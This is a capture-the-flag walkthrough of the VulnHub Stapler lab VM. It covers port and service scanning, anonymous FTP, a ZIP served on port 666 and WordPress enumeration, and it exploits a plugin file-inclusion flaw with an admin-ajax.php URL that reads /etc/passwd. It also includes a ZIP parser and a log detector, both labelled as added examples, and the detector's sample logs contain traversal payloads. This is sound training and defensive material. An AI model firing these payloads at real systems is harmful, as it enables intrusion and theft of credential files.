VulnHub Stapler walkthrough

Target discovery

Since the target VM is on the same network, arp-scan can be used to discover it:

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan 192.168.56.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6f:0f:9f, IPv4: 192.168.56.128
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    00:50:56:c0:00:08       (Unknown)
192.168.56.2    00:50:56:fa:da:39       (Unknown)
192.168.56.134  00:0c:29:72:d7:b4       (Unknown)
192.168.56.254  00:50:56:e6:5b:75       (Unknown)

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.861 seconds (137.56 hosts/sec). 4 responded

From the scan results the target should be 192.168.56.134. Next comes asset enumeration: find the open ports and identify the services behind them.

Information gathering

This can be done with fscan or nmap.

Open ports

Port scan:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -p- 192.168.56.134 --min-rate=10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-01 16:12 EDT
Nmap scan report for 192.168.56.134
Host is up (0.00066s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 00:0C:29:72:D7:B4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.54 seconds

Service identification on the open ports:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -p20,21,22,53,80,123,137,138,139,666,3306,12380,2 -A 192.168.56.134 --min-rate=10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-01 16:15 EDT
Nmap scan report for 192.168.56.134
Host is up (0.00077s latency).

PORT      STATE    SERVICE     VERSION
2/tcp     filtered compressnet
20/tcp    closed   ftp-data
21/tcp    open     ftp         vsftpd 2.0.8 or later
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.56.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp    open     ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open     domain      dnsmasq 2.75
| dns-nsid:
|_  bind.version: dnsmasq-2.75
80/tcp    open     http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp   closed   ntp
137/tcp   closed   netbios-ns
138/tcp   closed   netbios-dgm
139/tcp   open     netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open     pkzip-file  .ZIP file
| fingerprint-strings:
|   NULL:
|     message2.jpgUT
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open     mysql       MySQL 5.7.12-0ubuntu1
| mysql-info:
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 9
|   Capabilities flags: 63487
|   Some Capabilities: ConnectWithDatabase, IgnoreSigpipes, Speaks41ProtocolOld, InteractiveClient, LongPassword, DontAllowDatabaseTableColumn, Support41Auth, SupportsTransactions, Speaks41ProtocolNew, FoundRows, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: *\x01E\x04\x11\x15QC}\x7F\x1F\x02o\x19: ;1f>
|_  Auth Plugin Name: mysql_native_password
12380/tcp open     http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.95%I=7%D=5/1%Time=69F509D5%P=x86_64-pc-linux-gnu%r(NULL
SF:,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x15
SF:2\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x04
SF:\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa2
SF:\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\x
SF:0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\xb
SF:2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu\
SF:xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd3
SF:\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa0
SF:\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x8
SF:7\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\xf
SF:4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\xd
SF:c\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd5
SF:\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xaf
SF:\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:\
SF:xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\x
SF:8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\x
SF:e7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd\
SF:xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\x
SF:9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\x
SF:f1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\x
SF:f8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak\
SF:xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\x
SF:d2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f\
SF:xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\[
SF:\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\xc
SF:c\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa7
SF:\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\x
SF:fd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x96
SF:\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f\
SF:xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4\
SF:xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\x
SF:88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xbc
SF:L}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0\
SF:.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\x
SF:f6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\xf
SF:3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\?
SF:\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 00:0C:29:72:D7:B4 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=5/1%OT=21%CT=20%CU=37001%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=69F50A0C%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10C%TI=Z%CI=I%TS=8
OS:)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%T
OS:S=8)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)SEQ(SP=105%GCD=1%ISR=10D%TI=
OS:Z%CI=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST1
OS:1NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7
OS:120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:N)

Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2026-05-02T05:13:47+01:00
| smb2-time:
|   date: 2026-05-02T04:13:47
|_  start_date: N/A
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 7h38m07s, deviation: 34m37s, median: 7h58m06s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms 192.168.56.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.79 seconds

Summary:

Combining the two scans above gives the following picture:

Port    Service   Version                   Key findings
21      FTP       vsftpd 3.0.3              anonymous login allowed (Anonymous FTP login allowed)
22      SSH       OpenSSH 7.2p2 Ubuntu 4    candidate for brute force or known vulnerabilities
53      DNS       dnsmasq 2.75              DNS service
80      HTTP      PHP cli server 5.5+       returns 404; PHP built-in development server
139     Samba     smbd 4.3.9-Ubuntu         message signing disabled, guest account
666     custom    .ZIP file service         returns a ZIP archive containing message2.jpg
3306    MySQL     5.7.12-0ubuntu1           mysql_native_password authentication
12380   HTTP      Apache 2.4.18             reachable web service

FTP service (21)

The scan showed that anonymous login is allowed, so log in and look for information.

┌──(kali㉿kali)-[~/Work/stepler]
└─$ sudo ftp 192.168.56.134
Connected to 192.168.56.134.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.56.134:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
550 Permission denied.
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
100% |***********************|   107        7.61 KiB/s    00:00 ETA
226 Transfer complete.
107 bytes received in 00:00 (6.21 KiB/s)
ftp> exit
221 Goodbye.

┌──(kali㉿kali)-[~/Work/stepler]
└─$ cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

There is a single note file. It contains nothing directly useful apart from two names, which are worth saving for later password spraying and similar use.

Custom service (666)

The scan showed a custom service on port 666 that serves a .ZIP file; it can be reached with nc.


Download it with nc:

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ nc 192.168.56.134 666 > 666

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ ls
666

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ file 666
666: Zip archive data, made by v3.0 UNIX, extract using at least v2.0, last modified Jun 03 2016 16:03:08, uncompressed size 12821, method=deflate

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ mv 666 666.zip

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ unzip 666.zip
Archive:  666.zip
  inflating: message2.jpg

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ ll
总计 28
-rw-rw-r-- 1 kali kali 11608  5月 2日 10:03 666.zip
-rw-r--r-- 1 kali kali 12821 2016年 6月 3日 message2.jpg
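What `file` and the nmap banner grab saw on port 666 is the raw ZIP stream: the local file header starts with the `PK\x03\x04` magic, is followed by the member name, and then by the extra field, whose first ID in archives produced by Info-ZIP is `UT` (0x5455, extended timestamp), which is why nmap's fingerprint shows `message2.jpgUT`. The following is an added example, not part of the original writeup: a small parser for ZIP local file headers that recovers the member name, compression method, DOS timestamp and sizes from such a stream. The archive it parses is constructed in memory to resemble the one on the box (one member, `message2.jpg`, deflated, with the timestamp `file` reported); the member body is a fake JPEG header plus padding, not the real picture.

```python
import io
import struct
import zipfile

LOCAL_HEADER_MAGIC = b"PK\x03\x04"
METHOD_NAMES = {0: "stored", 8: "deflate"}


def build_sample_archive() -> bytes:
    """Constructed stand-in for the archive served on port 666 (not the real file)."""
    body = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 64  # fake JPEG header + padding
    info = zipfile.ZipInfo("message2.jpg", date_time=(2016, 6, 3, 16, 3, 8))
    info.compress_type = zipfile.ZIP_DEFLATED
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(info, body)
    return buf.getvalue()


def dos_datetime(mdate: int, mtime: int) -> tuple:
    """Decode the MS-DOS date/time pair stored in a ZIP header (2 s resolution)."""
    year = ((mdate >> 9) & 0x7F) + 1980
    month = (mdate >> 5) & 0x0F
    day = mdate & 0x1F
    hour = (mtime >> 11) & 0x1F
    minute = (mtime >> 5) & 0x3F
    second = (mtime & 0x1F) * 2
    return (year, month, day, hour, minute, second)


def parse_local_headers(data: bytes) -> list:
    """Walk the local file headers of a ZIP stream and return one record per member.

    Only the local headers are read (what a banner grab sees), not the central directory.
    """
    records = []
    pos = 0
    while data[pos:pos + 4] == LOCAL_HEADER_MAGIC:
        # 26 bytes of fixed fields follow the 4-byte signature.
        fields = struct.unpack("<HHHHHIIIHH", data[pos + 4:pos + 30])
        _version, flags, method, mtime, mdate, crc, csize, usize, nlen, xlen = fields
        name = data[pos + 30:pos + 30 + nlen].decode("utf-8", "replace")
        extra = data[pos + 30 + nlen:pos + 30 + nlen + xlen]
        # Collect extra-field IDs; 0x5455 ("UT") is the extended timestamp field
        # that shows up right after the file name in nmap's output.
        extra_ids = []
        epos = 0
        while epos + 4 <= len(extra):
            eid, elen = struct.unpack("<HH", extra[epos:epos + 4])
            extra_ids.append(eid)
            epos += 4 + elen
        records.append({
            "name": name,
            "method": METHOD_NAMES.get(method, str(method)),
            "modified": dos_datetime(mdate, mtime),
            "crc32": crc,
            "compressed_size": csize,
            "uncompressed_size": usize,
            "extra_ids": extra_ids,
        })
        if flags & 0x0008:
            # Bit 3 set: sizes live in a trailing data descriptor, so the next
            # header cannot be located from this one; stop rather than guess.
            break
        pos += 30 + nlen + xlen + csize
    return records


if __name__ == "__main__":
    for rec in parse_local_headers(build_sample_archive()):
        print(rec)
```

Running it prints one record whose name, method and timestamp match what `file` reported above. The same function can be pointed at the bytes captured with `nc` to confirm the archive's contents before unpacking anything from an untrusted service.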

Unzipping releases an image file; check whether it carries any hidden strings:

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ strings message2.jpg
JFIF
vPhotoshop 3.0
8BIM
1If you are reading this, you should get a cookie!
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
        #3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
/<}m
>,xr?
u-o[
Sxw]
v;]>
|_m7
l~!|0
<Elu
I[[k:>
>5[^k
;o{o
>xgH
mCXi
PE<R"
umcV
g[Y@=
[\Y_
\Oku
'X|(
?=?i
//Do
1okb
,>,&
n<;oc
*?      xC
~ |y
6{M6

Nothing useful there, so view the image itself.


Nothing useful there either, just one more name: Scott

Web services (80, 12380)

There are two web services; visit each and run directory enumeration:

port-80

Visiting it directly shows nothing useful.


Directory enumeration turned up a few files:

┌──(kali㉿kali)-[~/Work/stepler]
└─$ dirsearch -u "http://192.168.56.134"

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Work/stepler/reports/http_192.168.56.134/_26-05-02_10-19-16.txt

Target: http://192.168.56.134/

[10:19:16] Starting:
[10:19:17] 200 -  220B  - /.bash_logout
[10:19:17] 200 -    4KB - /.bashrc
[10:19:21] 200 -  675B  - /.profile

Task Completed

All of them were downloaded and inspected, but they contain nothing useful.

port-12380

Visiting the target directly:


Nothing useful; capture the traffic and inspect the response.


The response carries an unusual header and a 400 status, which suggests the request is using the wrong protocol, and directory enumeration finds nothing either:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ dirsearch -u http://192.168.56.134:12380

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Work/stepler/12380/reports/http_192.168.56.134_12380/_26-05-02_10-38-18.txt

Target: http://192.168.56.134:12380/

[10:38:18] Starting:

Task Completed

Try switching the scheme to https.


Now it loads normally; run directory enumeration and service identification:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ dirsearch -u https://192.168.56.134:12380 -x 403

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Work/stepler/12380/reports/https_192.168.56.134_12380/_26-05-02_10-50-36.txt

Target: https://192.168.56.134:12380/

[10:50:36] Starting:
[10:51:08] 301 -  331B  - /javascript  ->  https://192.168.56.134:12380/javascript/
[10:51:16] 301 -  331B  - /phpmyadmin  ->  https://192.168.56.134:12380/phpmyadmin/
[10:51:16] 200 -    3KB - /phpmyadmin/
[10:51:16] 200 -    3KB - /phpmyadmin/doc/html/index.html
[10:51:17] 200 -    3KB - /phpmyadmin/index.php
[10:51:20] 200 -   59B  - /robots.txt

Task Completed

That produced a fair number of paths; try each of them:

/phpmyadmin is the database's web admin login page; with no password yet, it is set aside for now.

/robots.txt reveals two new directories:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ curl https://192.168.56.134:12380/robots.txt -k
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

PS: because the target uses a self-signed/expired certificate, -k is needed to skip certificate verification, otherwise the request fails.

The first directory pops an XSS alert; fetching it with curl shows a hint about disabling JS:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ curl https://192.168.56.134:12380/admin112233/ -k
<html>
<head>
<title>mwwhahahah</title>
<body>
<noscript>Give yourself a cookie! Javascript didn't run =)</noscript>
<script type="text/javascript">window.alert("This could of been a BeEF-XSS hook ;)");window.location="http://www.xss-payloads.com/";</script>
</body>
</html>

With JS disabled there is nothing useful on the page.


The second directory leads to a blog page.


The service is identified as WordPress, so directory brute-forcing can continue, or wpscan, the WordPress-specific vulnerability scanner, can be used to look for known vulnerabilities.

Directory brute force:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ sudo dirsearch -u https://192.168.56.134:12380/blogblog/ -x 403

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/Work/stepler/12380/reports/https_192.168.56.134_12380/_blogblog__26-05-02_11-29-08.txt

Target: https://192.168.56.134:12380/

[11:29:08] Starting: blogblog/
[11:29:47] 301 -    0B  - /blogblog/index.php  ->  https://192.168.56.134:12380/blogblog/
[11:29:47] 301 -    0B  - /blogblog/index.php/login/  ->  https://192.168.56.134:12380/blogblog/login/
[11:29:49] 200 -    7KB - /blogblog/license.txt
[11:30:01] 200 -    3KB - /blogblog/readme.html
[11:30:14] 301 -  338B  - /blogblog/wp-admin  ->  https://192.168.56.134:12380/blogblog/wp-admin/
[11:30:14] 200 -    1B  - /blogblog/wp-admin/admin-ajax.php
[11:30:14] 200 -    0B  - /blogblog/wp-config.php
[11:30:14] 500 -    3KB - /blogblog/wp-admin/setup-config.php
[11:30:14] 302 -    0B  - /blogblog/wp-admin/  ->  https://192.168.56.134:12380/blogblog/wp-login.php?redirect_to=https%3A%2F%2F192.168.56.134%3A12380%2Fblogblog%2Fwp-admin%2F&reauth=1
[11:30:14] 200 -  605B  - /blogblog/wp-admin/install.php
[11:30:14] 301 -  340B  - /blogblog/wp-content  ->  https://192.168.56.134:12380/blogblog/wp-content/
[11:30:14] 200 -  500B  - /blogblog/wp-content/
[11:30:14] 500 -    0B  - /blogblog/wp-content/plugins/hello.php
[11:30:14] 200 -  426B  - /blogblog/wp-content/uploads/
[11:30:14] 301 -  341B  - /blogblog/wp-includes  ->  https://192.168.56.134:12380/blogblog/wp-includes/
[11:30:14] 500 -    0B  - /blogblog/wp-includes/rss-functions.php
[11:30:14] 200 -    0B  - /blogblog/wp-cron.php
[11:30:14] 200 -    2KB - /blogblog/wp-includes/
[11:30:14] 200 -    1KB - /blogblog/wp-login.php
[11:30:14] 302 -    0B  - /blogblog/wp-signup.php  ->  https://192.168.56.134:12380/blogblog/wp-login.php?action=register
[11:30:15] 405 -   42B  - /blogblog/xmlrpc.php

Task Completed

/readme.html gives the version, 4.2.1.


The config file /blogblog/wp-config.php comes back empty; presumably we have no permission to read it.

The WordPress content directory (/blogblog/wp-content/) has three subdirectories (plugins, themes, uploads).


The uploads directory contains no files.


Check whether any plugin in the plugins directory has known vulnerabilities.


A searchsploit lookup for known vulnerabilities turned up a local file inclusion.


After downloading it (searchsploit -m id), the PoC it gives is:

http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

It can be triggered by running the script with python2 or by hand via the URL. Because the target's self-signed certificate causes certificate verification errors, the original script would need modification, so it is triggered manually here:

https://192.168.56.134:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd

The response gives a link.


Visiting it, however, shows nothing useful.


Some research shows that this vulnerability stores the file it reads under an image filename in the /wp-content/uploads/ directory.


Including a file that does not exist produces an error.

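From the defender's side, the exploitation pattern above is easy to spot in the web server log: every read goes through `admin-ajax.php` with `action=ave_publishPost` and a `thumb` parameter pointing at a local path, and the copied file then sits in `/wp-content/uploads/` until someone removes it. The following is an added example, not code from the writeup or from the plugin: a detector that parses Apache combined-format access log lines and flags `ave_publishPost` requests whose `thumb` value is a local path, a traversal, or a non-image URL. The log lines are constructed for the example (modelled on the requests shown above; the client IPs, timestamps, sizes and the benign remote-image request are invented), and treating a remote `http(s)` URL ending in an image extension as the plugin's intended use is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format log lines (not real server logs).
SAMPLE_ACCESS_LOG = r'''
192.168.56.128 - - [02/May/2026:12:01:03 +0100] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd HTTP/1.1" 200 93 "-" "Mozilla/5.0"
192.168.56.128 - - [02/May/2026:12:04:09 +0100] "GET /blogblog/wp-content/uploads/540471516.jpeg HTTP/1.1" 200 2908 "-" "Wget/1.21"
192.168.56.128 - - [02/May/2026:12:15:40 +0100] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php HTTP/1.1" 200 93 "-" "Mozilla/5.0"
192.168.56.50 - - [02/May/2026:12:20:00 +0100] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=hello&short=1&term=1&thumb=http://example.invalid/pic.jpg HTTP/1.1" 200 93 "-" "Mozilla/5.0"
192.168.56.50 - - [02/May/2026:12:21:00 +0100] "GET /blogblog/?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".webp")


def classify_thumb(value: str):
    """Return a reason string if the thumb value looks like a file-read attempt, else None."""
    v = unquote(value)
    if v.startswith(("http://", "https://")) and v.lower().endswith(IMAGE_EXT):
        return None  # assumption: remote image URL is the plugin's intended input
    if "../" in v or v.startswith("/"):
        return "local path / traversal"
    if "://" in v:
        return "non-image URL or stream wrapper"  # e.g. php://, file://
    return "unexpected thumb value"


def scan_access_log(text: str) -> list:
    """Flag ave_publishPost requests whose thumb parameter is not a remote image."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        query = parse_qs(parts.query)
        if query.get("action", [""])[0] != "ave_publishPost":
            continue
        for thumb in query.get("thumb", []):
            reason = classify_thumb(thumb)
            if reason:
                hits.append({
                    "ip": m["ip"],
                    "time": m["ts"],
                    "status": int(m["status"]),
                    "thumb": unquote(thumb),
                    "reason": reason,
                })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(hit)
```

On the sample it reports the two requests that read `/etc/passwd` and `../wp-config.php` and ignores the remote-image request and the ordinary page view. Any hit with status 200 should be followed by a check of `/wp-content/uploads/` for the copied file, since that is where the vulnerability leaves the data it read.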

Download the retrieved password file and read it:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ wget https://192.168.56.134:12380/blogblog/wp-content/uploads/540471516.jpeg --no-check-certificate
--2026-05-02 12:04:09--  https://192.168.56.134:12380/blogblog/wp-content/uploads/540471516.jpeg
正在连接 192.168.56.1:10808... 已连接。
警告: “192.168.56.134” 的证书不可信。
警告: “192.168.56.134” 的证书颁发者未知。
证书所有者与主机名 “192.168.56.134” 不符
已发出 Proxy 请求,正在等待回应... 200 OK
长度:2908 (2.8K) [image/jpeg]
正在保存至: “540471516.jpeg”

540471516.jpeg                           100%[===============================================================================>]   2.84K  --.-KB/s  用时 0s

2026-05-02 12:04:09 (21.9 MB/s) - 已保存 “540471516.jpeg” [2908/2908])


┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ cat 540471516.jpeg
root:x:0:0:root:/root:/bin/zsh
